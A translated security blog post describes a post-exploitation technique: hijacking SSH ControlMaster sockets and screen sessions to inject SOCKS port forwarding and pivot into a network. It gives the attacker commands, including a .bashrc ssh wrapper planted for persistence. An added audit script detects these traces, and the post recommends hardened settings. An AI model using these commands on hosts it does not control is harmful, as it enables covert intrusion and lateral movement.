Hijacking SSH sessions to inject port forwarding
0x00 Preface
Yesterday someone in a group of very capable people shared a link about a technique that is well suited to leaving a backdoor; it belongs to the post-exploitation stage. I had never used this method before and had been using ld_preload backdoors the whole time. After testing it in a real environment and finding that it works and has real practical value, I am writing it up here; please point out any mistakes.
0x01 Details
1.1 Scenario 1:
The attack process is as follows: the SSH client (ssh_user) connects to ipv_1, and the attacker already controls the ssh_user machine. The attacker injects port forwarding into the existing session to reach the network behind ipv_1, i.e. ipv_2. The procedure is as follows:
1. The attacker can modify the SSH client configuration in two ways. With root permission, edit /etc/ssh/ssh_config directly. Without permission to modify ssh_config, wrap ssh in a shell function in .bashrc instead. The main directives involved are:
ControlPath /tmp/%r@%h:%p
ControlMaster auto
ControlPersist yes
If ControlPersist is enabled, the session can still be hijacked after the user has exited the SSH session, because the control socket file is not deleted.
2. When ssh_user connects to ipv_1 (192.168.56.131), a socket file is created in the /tmp directory. We connect through it with:
ssh -S /tmp/root@192.168.56.131\:22 %h
The command for injecting port forwarding is as follows:
ssh -O forward -D 8888 -S /tmp/root@192.168.56.131\:22 %x
After executing this command, port 8888 on the ssh_user machine can be used as a SOCKS5 proxy to access the network segment behind ipv_2.
3. As mentioned earlier, if ControlPersist is yes, the socket file is not deleted automatically. We can delete /tmp/root@192.168.56.131:22 manually with rm, or more elegantly use:
root@kali:~# ssh -O exit -S /tmp/root@192.168.56.131\:22 %x
The method for wrapping the ssh command in .bashrc is as follows:
ssh () { /usr/bin/ssh -o "ControlMaster=auto" -o "ControlPath=/tmp/%r@%h:%p" -o "ControlPersist=yes" "$@";}
1.2 Scenario 2:
This is the case when ssh_user uses screen to manage ssh sessions. The steps are as follows:
1. When ssh_user runs
screen ssh root@192.168.56.131
to connect to the remote host ipv_1 (192.168.56.131), the corresponding file appears under /var/run/screen:
root@kali:~# ls -la /var/run/screen/
total 0
drwxrwxr-x  3 root utmp  60 Mar 16 03:37 .
drwxr-xr-x 20 root root 640 Mar  3 21:23 ..
drwx------  2 root root  60 Mar 16 04:21 S-root
Here S-root represents a session belonging to the local root user. You can take over the session with screen -r root/, or with screen -x 6851.pts-0.kali.
2. To inject port forwarding, first run script /dev/null to bypass the pts/tty restriction. The commands are as follows:
root@kali:~# lsof -i TCP:8888
root@kali:~# script /dev/null
Script started, file is /dev/null
root@kali:~# screen -S 6851.pts-0.kali -p 0 -X stuff $'~C'
root@kali:~# screen -S 6851.pts-0.kali -p 0 -X stuff $'-D:8888\n\n'
root@kali:~# lsof -i TCP:8888
COMMAND PID  USER FD TYPE DEVICE SIZE/OFF NODE NAME
ssh     6852 root 7u IPv4 94301  0t0      TCP  *:8888 (LISTEN)
ssh     6852 root 8u IPv6 94302  0t0      TCP  *:8888 (LISTEN)
Injecting into an SSH session running inside screen has one drawback: the commands you type are displayed to the currently connected user at the same time, which makes it easy to detect.
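Both scenarios above leave traces a defender can look for on the client machine: the ControlMaster/ControlPath/ControlPersist directives in ssh_config, an ssh() wrapper function in .bashrc, a leftover control socket in /tmp named like user@host:port, and screen session sockets under /var/run/screen/S-<user>. The audit script below is an added example written for this page, not code from the original post or from OpenSSH; it checks each of those conditions on constructed sample files and prints findings. The sample directory, the file names ssh_config, ssh_config.hardened and bashrc, and the fake screen entry 6851.pts-0.kali are all constructed for the demo; the hardened config shown (ControlPersist no, a ControlPath under ~/.ssh using the %C hash token) is the setting that closes the window the post relies on.

```shell
#!/bin/sh
# Added example: audit an SSH client host for the conditions that enable
# ControlMaster session hijacking (persistent control sockets in a shared
# directory, an ssh() wrapper in .bashrc) and list screen sessions that
# could be driven with "screen -X stuff".

# Print the ControlMaster, ControlPath and ControlPersist directives of an
# ssh_config-style file, one per line as "Key Value" (handles "Key=Value" too).
control_directives() {
    grep -iE '^[[:space:]]*(ControlMaster|ControlPath|ControlPersist)([[:space:]]|=)' "$1" 2>/dev/null \
        | sed -E 's/^[[:space:]]+//; s/[[:space:]]*=[[:space:]]*/ /'
}

# Succeed (exit 0) if ControlPersist is set to anything other than "no":
# "yes" or a time value keeps the master alive after the user's client exits.
controlpersist_enabled() {
    control_directives "$1" \
        | awk 'tolower($1)=="controlpersist" && tolower($2)!="no" {found=1} END {exit !found}'
}

# Succeed if ControlPath places the control socket in a shared world-writable
# directory such as /tmp, where any process running as the user can find it.
controlpath_in_tmp() {
    control_directives "$1" \
        | awk 'tolower($1)=="controlpath" && $2 ~ "^/(tmp|var/tmp|dev/shm)/" {found=1} END {exit !found}'
}

# Succeed if the file defines a shell function named ssh (the .bashrc trick
# used when /etc/ssh/ssh_config is not writable).
ssh_wrapper_defined() {
    grep -qE '^[[:space:]]*(function[[:space:]]+)?ssh[[:space:]]*\(\)' "$1" 2>/dev/null
}

# List unix sockets in a directory whose names look like user@host:port.
# Only real sockets count; a regular file with such a name is ignored.
leftover_sockets() {
    find "$1" -maxdepth 1 -type s -name '*@*:*' 2>/dev/null
}

# List screen sessions as "owner session-name" from a /var/run/screen-style dir.
screen_sessions() {
    for d in "$1"/S-*; do
        [ -d "$d" ] || continue
        owner=${d##*/S-}
        for s in "$d"/*; do
            [ -e "$s" ] || continue
            echo "$owner ${s##*/}"
        done
    done
}

# Run every check and print RISK:/INFO: lines.
# $1 ssh_config, $2 bashrc, $3 socket directory, $4 screen run directory
audit_host() {
    controlpersist_enabled "$1" && echo "RISK: $1 keeps the master connection alive (ControlPersist)"
    controlpath_in_tmp "$1"     && echo "RISK: $1 puts the control socket in a shared directory"
    ssh_wrapper_defined "$2"    && echo "RISK: $2 redefines ssh as a shell function"
    leftover_sockets "$3" | while read -r s; do echo "RISK: leftover control socket $s"; done
    screen_sessions "$4" | while read -r u s; do echo "INFO: screen session $s owned by $u"; done
    return 0
}

# Build a constructed sample tree (weak config from the post, a hardened
# counterpart, the .bashrc wrapper, a decoy file and a fake screen session).
make_sample_dir() {
    d=$(mktemp -d)
    cat > "$d/ssh_config" <<'EOF'
Host *
    ControlMaster auto
    ControlPath /tmp/%r@%h:%p
    ControlPersist yes
EOF
    cat > "$d/ssh_config.hardened" <<'EOF'
Host *
    ControlMaster auto
    ControlPath ~/.ssh/cm-%C
    ControlPersist no
EOF
    cat > "$d/bashrc" <<'EOF'
ssh () { /usr/bin/ssh -o "ControlMaster=auto" -o "ControlPath=/tmp/%r@%h:%p" -o "ControlPersist=yes" "$@";}
EOF
    : > "$d/root@192.168.56.131:22"          # regular file, not a socket
    mkdir -p "$d/screen/S-root"
    : > "$d/screen/S-root/6851.pts-0.kali"   # constructed screen session entry
    echo "$d"
}

sample=$(make_sample_dir)
audit_host "$sample/ssh_config" "$sample/bashrc" "$sample" "$sample/screen"
rm -rf "$sample"
```

On a real host, point audit_host at /etc/ssh/ssh_config and ~/.ssh/config, the user's .bashrc, /tmp and /var/run/screen. A leftover socket can be verified and closed with ssh -O check / ssh -O exit -S <socket> <host>, and a ControlPath under ~/.ssh with ControlPersist no (or a short timeout) removes the persistent master the injection depends on.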